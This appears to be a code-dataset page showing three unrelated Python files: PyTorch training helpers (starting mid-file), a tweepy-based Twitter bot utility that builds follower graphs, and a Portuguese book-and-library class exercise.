m -= torch.mean(m, dim=1, keepdim=True)
mt = m.t() # if complex: mt = m.t().conj()
return fact * m.matmul(mt).squeeze()
def gpu(tensor, gpu=False):
if gpu:
return tensor.cuda()
else:
return tensor
def cpu(tensor):
if tensor.is_cuda:
return tensor.cpu()
else:
return tensor
def minibatch(*tensors, **kwargs):
batch_size = kwargs.get('batch_size', 128)
if len(tensors) == 1:
tensor = tensors[0]
for i in range(0, len(tensor), batch_size):
yield tensor[i:i + batch_size]
else:
for i in range(0, len(tensors[0]), batch_size):
yield tuple(x[i:i + batch_size] for x in tensors)
def shuffle(*arrays, **kwargs):
random_state = kwargs.get('random_state')
if len(set(len(x) for x in arrays)) != 1:
raise ValueError('All inputs to shuffle must have '
'the same length.')
if random_state is None:
random_state = np.random.RandomState()
shuffle_indices = np.arange(len(arrays[0]))
random_state.shuffle(shuffle_indices)
if len(arrays) == 1:
return arrays[0][shuffle_indices]
else:
return tuple(x[shuffle_indices] for x in arrays)
def assert_no_grad(variable):
if variable.requires_grad:
raise ValueError(
"nn criterions don't compute the gradient w.r.t. targets - please "
"mark these variables as volatile or not requiring gradients"
)
def set_seed(seed, cuda=False):
torch.manual_seed(seed)
if cuda:
torch.cuda.manual_seed(seed)
|
python
|
import tweepy
import networkx as nx
class Utils():
"""
Utility functions for rundown.
"""
def __init__(self):
"""Constructor. Nothing to see here."""
self.rundown = self.init_rundown()
def init_rundown(self):
"""
Authenticates API, etc.
Parameters
----------
None
Returns
-------
api
"""
env_vars = {}
with open("../.env", "r") as f:
for line in f:
(key, val) = line.split(": ")
env_vars[key] = val.replace("\n", "")
auth = tweepy.OAuthHandler(
env_vars["API KEY"],
env_vars["API SECRET KEY"])
auth.set_access_token(
env_vars["ACCESS TOKEN"],
env_vars["ACCESS TOKEN SECRET"])
api = tweepy.API(
auth,
wait_on_rate_limit=True,
wait_on_rate_limit_notify=True)
try:
api.verify_credentials()
except:
raise ValueError("Configuration failed.")
return api
def get_mentions(self, last_id = None):
"""
Returns 20 most recent tweets from timeline mentioning @rundown_bot.
Parameters
----------
last_id : `int`
Returns
-------
mentions : `list'
20 most recent tweets from timeline mentioning @rundown_bot.
"""
if not last_id or last_id == 0:
mentions = self.rundown.mentions_timeline()
else:
mentions = self.rundown.mentions_timeline(since_id = last_id)
mentions.reverse()
return mentions
def get_following(self, user):
"""
Returns a list of users that user_name is following.
Parameters
----------
user : `str`
the user/screen name of the account you want information about
Returns
-------
following : `list`
list of users that user_name is following
"""
following = []
for page in tweepy.Cursor(
self.rundown.friends,
screen_name = user,
wait_on_rate_limit = True,
count = 200).pages():
try:
following.extend(page)
except tweepy.TweepError as e:
time.sleep(60)
following = [f.screen_name for f in following]
return following
def does_follow(self, user1, user2):
"""
Returns True if user1 follows user2.
Parameters
----------
user1 : `str`
the user/screen name of one account you want information about
user2 : `str`
the user/screen name of the other account you want information about
Returns
-------
val : `bool`
if user1 follows user2
"""
following = self.get_following(user1)
return user2 in following
def build_graph_between(self, user1, user2, max_depth = 5):
"""
DON'T USE THIS (RATE LIMIT)
Builds a minimal graph of user-following between user1 and user2.
Parameters
----------
user1 : `str`
the user/screen name of one account you want information about
user2 : `str`
the user/screen name of the other account you want information about
max_depth : `int`
maximum search depth for tree construction
Returns
-------
G : `networkx Graph`
"""
G = nx.Graph()
depth = 1
G.add_nodes_from([user1, user2])
following1 = self.get_following(user1)
following2 = self.get_following(user2)
for f in following1:
G.add_node(f)
G.add_edge(user1, f)
for f in following2:
G.add_node(f)
G.add_edge(user2, f)
new_members = following1 + following2
if nx.has_path(user1, user2):
return G
while depth < max_depth:
new_members_new = []
for f in new_members:
following = self.get_following(f) #users f is following
for new_f in following: #each user f is following
if new_f not in G:
#if f is following a user not in G, add user to G
G.add_node(new_f)
new_members_new.append(new_f)
G.add_edge(f, new_f)
if nx.has_path(user1, user2):
return G
depth += 1
new_members = new_members_new
if nx.has_path(user1, user2):
return G
else:
raise ValueError("%s and %s not connected with search depth of 5.")
def get_user_distance(self, user1, user2, max_depth = 5):
"""
DON'T USE THIS (RATE LIMIT)
Users A* algorithm to compute distance between users in following graph.
Parameters
----------
user1 : `str`
the user/screen name of one account you want information about
user2 : `str`
the user/screen name of the other account you want information about
max_depth : `int`
maximum search depth for tree construction
Returns
-------
val : `int`
following distance between user1 and user2
"""
try:
G = self.build_graph_between(user1, user2, max_depth)
except ValueError as e:
raise ValueError("%s and %s not connected with search depth of 5.")
length = nx.astar_path_length(G, user1, user2)
return length
|
python
|
'''Crie as classes necessárias para um sistema de gerenciamento de uma biblioteca. Os
bibliotecários deverão preencher o sistema com o título do livro, os autores, o ano, a editora, a
edição e o volume. A biblioteca também terá um sistema de pesquisa (outro software), portanto
será necessário conseguir acessar os atributos típicos de pesquisa (nome, autor, …).'''
class Livro():
def __init__(self, titulo: str, autores: str, ano: str, editora: str, edicao=1, volume=1):
self.__titulo = titulo
self.__autores = autores
self.__ano = ano
self.__editora = editora
self.__edicao = edicao
self.__volume = volume
@property
def titulo(self):
return self.__titulo
@property
def autores(self):
return self.__autores
@property
def ano(self):
return self.__ano
@property
def editora(self):
return self.__editora
@property
def edicao(self):
return self.__edicao
@property
def volume(self):
return self.__volume
class Biblioteca():
def __init__(self, livros: list):
self.__livros = livros
@property
def livros(self):
return self.__livros
def adicionar_livro(self, livro: Livro):
self.livros.append(livro)
def exibir_livros(self):
c = 0
for livro in self.livros:
c += 1
print(f'{c}. {livro.titulo} ({livro.ano}), por {livro.autores}, editora {livro.editora}, ed. {livro.edicao}, vol. {livro.volume}')
def main():
livro1 = Livro('Admirável mundo novo', 'Aldous Huxley', '1932', 'Biblioteca Azul')
livro2 = Livro('Morte na Mesopotâmia', 'Agatha Christie', '1936', 'Arqueiro', '19')
livro3 = Livro('Life, the Universe and Everything', 'Douglas Adams', '1982', 'Del Rey', '1', '3')
livro4 = Livro('Cidades de Papel', 'John Green', '2008', 'Intrinseca')
Biblioteca1 = Biblioteca([livro1, livro2, livro3])
Biblioteca1.adicionar_livro(livro4)
Biblioteca1.exibir_livros()
main()
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.